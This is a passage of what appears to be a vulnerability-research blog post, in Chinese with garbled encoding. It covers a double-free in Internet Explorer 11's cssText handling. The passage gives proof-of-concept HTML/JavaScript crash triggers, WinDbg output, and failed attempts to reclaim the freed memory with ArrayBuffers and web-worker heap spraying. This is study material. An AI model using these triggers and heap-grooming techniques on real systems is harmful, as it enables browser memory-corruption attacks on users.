                /*case 34:*/
                        this.style.cssText = '-ms-layout-grid: char strict auto auto; -ms-layout-grid: none fixed 49cp auto;';
                        break;
        }
}
elm.addEventListener('DOMAttrModified', func, true)
elm.className = 'AAAAAAAAA'

elm.removeEventListener('DOMAttrModified', func, true);
worker = new Worker('worker.js');
worker.postMessage(elm.style.cssText);
worker.terminate();
var arr = new ArrayBuffer(0x22);

}
&lt;/script&gt;

&lt;body onload='testcase();'&gt;
&lt;/html&gt;
</code></pre></div></div>

<p>ç„¶è€Œåœ¨è°ƒè¯•æ—¶å‘ç°<code class="language-plaintext highlighter-rouge">worker.terminate();</code>æ‰§è¡Œåï¼ŒcssTextå­—ç¬¦ä¸²å¹¶æ²¡æœ‰è¢«é‡Šæ”¾ï¼Œä¹Ÿå°±æ— æ³•å ç”¨å†…å­˜åˆ©ç”¨ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:007&gt; g
Breakpoint 0 hit
eax=00000002 ebx=04de1a50 ecx=6a854520 edx=040ab4d0 esi=00000002 edi=040ab540
eip=6e1b3027 esp=040ab4c8 ebp=040ab530 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19a:
6e1b3027 ff55e8          call    dword ptr [ebp-18h]  ss:002b:040ab518={MSHTML!CFastDOM::CWorker::Trampoline_postMessage (6a854520)}
0:007&gt; g
Breakpoint 0 hit
eax=00000001 ebx=04de1a80 ecx=6b07b4c0 edx=040ab4d8 esi=00000001 edi=040ab548
eip=6e1b3027 esp=040ab4d0 ebp=040ab538 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19a:
6e1b3027 ff55e8          call    dword ptr [ebp-18h]  ss:002b:040ab520={MSHTML!CFastDOM::CWorker::Trampoline_terminate (6b07b4c0)}
0:007&gt; dd 03adb930 La*4
03adb930  04091400 6a3b9068 00000002 0000000f
03adb940  0409140a 6a3b9068 00000001 0000000f
03adb950  04091400 6a3b9140 00000002 0000000f
03adb960  0409140a 6a3b9140 00000001 0000000f
03adb970  04090300 6a3a5b4c 00000001 6b3fd8e4
03adb980  04090300 6a3a5c58 00000002 03080c04
03adb990  808c1f0a 8001140b 043cc748 00000006
03adb9a0  808c1f0a 8001140b 043cc7f0 6b3fd988
03adb9b0  84081f0a 8001140b 043cc780 043cc7aa
03adb9c0  84081f0a 8001140b 043cc780 043cc7aa
0:007&gt; g
Breakpoint 0 hit
eax=00000002 ebx=04db3360 ecx=6b062d40 edx=040ab4d0 esi=00000002 edi=040ab540
eip=6e1b3027 esp=040ab4c8 ebp=040ab530 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19a:
6e1b3027 ff55e8          call    dword ptr [ebp-18h]  ss:002b:040ab518={MSHTML!CFastDOM::CWindow::Trampoline_alert (6b062d40)}
0:007&gt; dd 03adb930 La*4
03adb930  04091400 6a3b9068 00000002 0000000f
03adb940  0409140a 6a3b9068 00000001 0000000f
03adb950  04091400 6a3b9140 00000002 0000000f
03adb960  0409140a 6a3b9140 00000001 0000000f
03adb970  04090300 6a3a5b4c 00000001 6b3fd8e4
03adb980  04090300 6a3a5c58 00000002 03080c04
03adb990  808c1f0a 8001140b 043cc748 00000006
03adb9a0  808c1f0a 8001140b 043cc7f0 6b3fd988
03adb9b0  84081f0a 8001140b 043cc780 043cc7aa
03adb9c0  84081f0a 8001140b 043cc780 043cc7aa
0:007&gt; du 043cc780 
043cc780  "char strict auto auto"
0:007&gt; du 043cc748 
043cc748  "none fixed 49cp auto"
</code></pre></div></div>

<h3 id="å°è¯•äºŒè®¾ç½®csstextæ¸…ç©ºå†…å­˜">å°è¯•äºŒï¼šè®¾ç½®cssTextæ¸…ç©ºå†…å­˜</h3>

<p>åœ¨åˆ†ææ¼æ´åŸç†æ—¶å¾—çŸ¥ï¼Œæ¯æ¬¡è®¾ç½®æ–°çš„cssTextå†…å®¹æ—¶ï¼Œä¼šå…ˆæ¸…é™¤åŸæœ¬çš„å­—ç¬¦ä¸²åå†èµ‹å€¼æ–°çš„å­—ç¬¦ä¸²ï¼Œå› æ­¤åˆ©ç”¨è¯¥ç‰¹æ€§æ¸…é™¤åŸæœ¬çš„å­—ç¬¦ä¸²æ—¶åº”è¯¥ä¹Ÿä¼šäº§ç”Ÿå´©æºƒã€‚äºæ˜¯ä¿®æ”¹POCæ‰§è¡Œ<code class="language-plaintext highlighter-rouge">elm.style.cssText = '';</code>ï¼Œç»“æœéªŒè¯çŒœæƒ³ï¼Œç¡®å®ä¼šäº§ç”Ÿå´©æºƒï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:007&gt; g
Breakpoint 0 hit
eax=00000004 ebx=0343a600 ecx=6a7145f0 edx=036ab500 esi=00000004 edi=036ab578
eip=6e1b3027 esp=036ab4f8 ebp=036ab568 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19a:
6e1b3027 ff55e8          call    dword ptr [ebp-18h]  ss:002b:036ab550={MSHTML!CFastDOM::CNode::Trampoline_removeEventListener (6a7145f0)}
0:007&gt; g
Breakpoint 0 hit
eax=00000001 ebx=03436990 ecx=6a3df860 edx=036ab308 esi=00000001 edi=036ab374
eip=6e1b3027 esp=036ab300 ebp=036ab364 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19a:
6e1b3027 ff55e8          call    dword ptr [ebp-18h]  ss:002b:036ab34c={MSHTML!CFastDOM::CHTMLElement::Trampoline_Get_style (6a3df860)}
0:007&gt; g
Breakpoint 0 hit
eax=00000002 ebx=03448b10 ecx=6a535d30 edx=036ab3f8 esi=00000002 edi=036ab46c
eip=6e1b3027 esp=036ab3f0 ebp=036ab45c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19a:
6e1b3027 ff55e8          call    dword ptr [ebp-18h]  ss:002b:036ab444={MSHTML!CFastDOM::CCSSStyleDeclaration::Trampoline_Set_cssText (6a535d30)}
0:007&gt; g						//é‡æ–°è®¾ç½®cssTextåç”±äºé‡Šæ”¾äº†åŸæœ¬çš„cssTexté€ æˆäº†doublefree
Critical error detected c0000374
(a4c.32c): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=77342c0e edx=036aadd9 esi=005f0000 edi=036b8768
eip=7739e975 esp=036ab02c ebp=036ab0a4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
ntdll!RtlReportCriticalFailure+0x29:
7739e975 cc              int     3
</code></pre></div></div>

<p>æ¥ç€æ‰“ç®—åˆ©ç”¨addEventListeneræ·»åŠ æ–°çš„ç›‘å¬ï¼Œä½¿å¾—åœ¨æ¸…é™¤cssTextæ—¶èƒ½å¤Ÿæ‰§è¡Œå›è°ƒå‡½æ•°åˆ›å»ºArrayBufferå ç”¨è¢«é‡Šæ”¾çš„å†…å­˜ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;html&gt;
&lt;head&gt;
        &lt;meta http-equiv="Expires" content="-1"&gt;
&lt;head&gt;
&lt;script&gt;
	
var iterationCount = 0;
var R1 = new Array();	
function testcase() {
Math.atan2(1,0);
elm = document.createElement('ins')
func = function(e) {
        iterationCount++;
        switch (iterationCount) {
                case 1:
                case 2:
                case 12:
                case 22:
                /*case 34:*/
                        this.style.cssText = '-ms-layout-grid: char strict auto auto; -ms-layout-grid: none fixed 49cp auto;';
                        break;
        }
}
funcA = function(a) {
        for(var i=0;i&lt;0x100;++i)
		{
			R1[i] = new ArrayBuffer(0x2c);
		}

}
elm.addEventListener('DOMAttrModified', func, true)
elm.className = 'AAAAAAAAA'
elm.addEventListener('DOMAttrModified', funcA, true)
elm.style.cssText = '';				//æ‰§è¡Œè¯¥è¯­å¥ä¼šæ¸…ç©ºcssTextï¼Œå¯¼è‡´å´©æºƒ
var view = new DataView(R1[0]);
alert(view.byteLength);
}
&lt;/script&gt;

&lt;body onload='testcase();'&gt;
&lt;/html&gt;
</code></pre></div></div>

<p>ç„¶è€Œè°ƒè¯•åå‘ç°å›è°ƒè§¦å‘æ˜¯åœ¨æ¸…ç©ºcssTextä¹‹åï¼Œå› æ­¤æ— æ³•é€šè¿‡è¯¥ç§æ–¹å¼å¡«å……è¢«é‡Šæ”¾çš„å†…å­˜ã€‚</p>

<h3 id="å°è¯•ä¸‰åˆ©ç”¨workeræ–°å»ºçº¿ç¨‹è¿›è¡Œå ä½">å°è¯•ä¸‰ï¼šåˆ©ç”¨workeræ–°å»ºçº¿ç¨‹è¿›è¡Œå ä½</h3>

<p>åœ¨æŸ¥é˜…workeræ–°å»ºçº¿ç¨‹æ—¶æŸ¥çœ‹åˆ°<a href="https://exploiting.files.wordpress.com/2012/10/html5-heap-spray.pdf">html5-heap-spray</a>è¿™ç¯‡æ–‡ç« ï¼Œå¯ä»¥é€šè¿‡workeræ–°å»ºçº¿ç¨‹è¿›è¡Œå †å–·ï¼Œè¿™æ ·åœ¨æ¸…é™¤cssTextæ—¶å°±æœ‰æœºä¼šé€šè¿‡æ–°çº¿ç¨‹åˆ›å»ºçš„å¯¹è±¡å ä½è¢«é‡Šæ”¾çš„cssTextå®ç°UAFï¼š</p>

<p>ä¿®æ”¹åçš„poc.htmlï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;html&gt;
&lt;head&gt;
        &lt;meta http-equiv="Expires" content="-1"&gt;
&lt;head&gt;
&lt;script&gt;
	
var iterationCount = 0;
function testcase() {
elm = document.createElement('ins')
func = function(e) {
        iterationCount++;
        switch (iterationCount) {
                case 1:
                case 2:
                case 12:
                case 22:
                /*case 34:*/
                        this.style.cssText = '-ms-layout-grid: char strict auto auto; -ms-layout-grid: none fixed 49cp auto;';
                        break;
        }
}

elm.addEventListener('DOMAttrModified', func, true);
alert(1);
elm.className = 'AAAAAAAAA';
elm.removeEventListener('DOMAttrModified', func, true);
var workers = new Worker('worker.js');
var arr = new Arraybuffer(0x2c);
workers.postMessage(arr);
var arrview = new DataView(arr);
elm.style.cssText = '';
}
&lt;/script&gt;

&lt;body onload='testcase();'&gt;
&lt;/html&gt;
</code></pre></div></div>

<p>worker.js:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>onmessage = function(e){
	var a = Array();
	for(var i = 0; i&lt;0x100; i++){
		a[i] = new ArrayBuffer(0x2c);
	}
	postMessage(e);
}
</code></pre></div></div>

<p>ä½†æ˜¯åœ¨è°ƒè¯•è¿‡ç¨‹ä¸­ï¼Œæ‰§è¡Œåˆ°æ–°å»ºçº¿ç¨‹åç¨‹åºä¾¿æ— æ³•æ–­ä¸‹äº†ï¼ŒçŒœæµ‹æ²¡æœ‰åˆ›å»ºæ­£ç¡®çš„worker.jså¯¼è‡´æ— æ³•ç»§ç»­åˆ©ç”¨ï¼Œåˆ©ç”¨å°è¯•å¤±è´¥ã€‚</p>

<p>äºæ˜¯éªŒè¯IE11æ˜¯å¦èƒ½æ­£ç¡®ä½¿ç”¨web workerå¯¹è±¡ï¼Œç¼–å†™çš„web workerä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test.html:
&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
	&lt;title&gt;Web Worker&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
	&lt;p&gt;Web Worker is Counting Numbers&lt;/p&gt;

	&lt;p&gt;Counting: &lt;output id="countM"&gt;&lt;/output&gt;&lt;/p&gt;

	&lt;button onclick="alertMessage()"&gt;
		Alert On
	&lt;/button&gt;

	&lt;script&gt;
	
		// This is function to run alert
		function alertMessage() {
			alert("Web Worker is Running in Background");
		}

		// Created a web worker and passed script which
		// needs to execute in background
		var worker = new Worker("worker.js");

		// Called onmessage method to get value from
		// script file and show it on web page
		worker.onmessage = function (event) {
			document.getElementById("countM")
				.innerHTML = event.data;
		};
	&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
//------------------------------------------------------------

worker.js:
// Initialized a variable with 0
var count = 0;

function timedCount() {
count = count + 1;
	
// It is used to send value
// back to html page
postMessage(count);
	
// It is a timeout function
setTimeout("timedCount()",1000);
}

timedCount();
</code></pre></div></div>

<p>ä½¿ç”¨åŒæ ·çš„ä»£ç åœ¨Chromeå’ŒEdgeä¸­å‡èƒ½æ­£å¸¸æ‰§è¡Œï¼š</p>

<p><img src="https://blog-1257303866.cos.ap-guangzhou.myqcloud.com/img/image-20220630113303316.png" alt="image-20220630113303316" /></p>

<p>ç„¶è€Œåœ¨IE11ä¸­ï¼Œweb workerå´æ— æ³•æ­£å¸¸æ‰§è¡Œï¼ŒCountingæ²¡æœ‰æ­£ç¡®æ˜¾ç¤ºï¼š</p>

<p><img src="https://blog-1257303866.cos.ap-guangzhou.myqcloud.com/img/image-20220630113426845.png" alt="image-20220630113426845" /></p>

<p>å¯èƒ½ç”±äºIE11å¯¹äºweb workerçš„æ”¯æŒå¹¶ä¸æ˜¯å¾ˆå¤šï¼Œå¯¼è‡´è¯¥ç§åˆ©ç”¨æ–¹å¼æ— æ³•æˆåŠŸæ‰§è¡Œã€‚</p>

<h1 id="æ€»ç»“">æ€»ç»“</h1>

<p>æ¼æ´æ˜¯å› ä¸ºcssTextè¢«é€’å½’è®¾ç½®å¯¼è‡´å†…éƒ¨å­—ç¬¦ä¸²æŸåï¼Œå‡ºç°äº†ä¸¤ä¸ªæŒ‡å‘åŒä¸€ä¸ªå­—ç¬¦ä¸²çš„cssTextï¼Œå½“å†æ¬¡é‡ç½®cssTextæ—¶ï¼Œç”±äºåŒä¸€ä¸ªå­—ç¬¦ä¸²è¢«é‡Šæ”¾ä¸¤æ¬¡é€ æˆäº†æ¼æ´ã€‚åˆ©ç”¨æ€è·¯å¯ä»¥é€šè¿‡æ–°å»ºçº¿ç¨‹åœ¨é‡Šæ”¾cssTextæ—¶åˆ›å»ºå¯¹è±¡å ç”¨è¢«é‡Šæ”¾çš„å­—ç¬¦ä¸²å†…å­˜ï¼Œå®ç°ä»doublefreeåˆ°UAFã€‚</p>

<p>ç„¶è€Œåœ¨å®é™…åˆ©ç”¨è¿‡ç¨‹ä¸­ï¼Œå¯¹äºIEå¤šçº¿ç¨‹å¹¶ä¸ç†Ÿæ‚‰ï¼Œweb workeråœ¨IE11å¹¶ä¸èƒ½æ­£ç¡®æ‰§è¡Œï¼Œå¦‚æœæœ‰å…¶ä»–æ–¹å¼èƒ½å¤Ÿåˆ›å»ºå¤šçº¿ç¨‹å ä½å†…å­˜çš„è¯åˆ™èƒ½å¤Ÿåˆ©ç”¨è¯¥æ¼æ´ã€‚</p>

:ET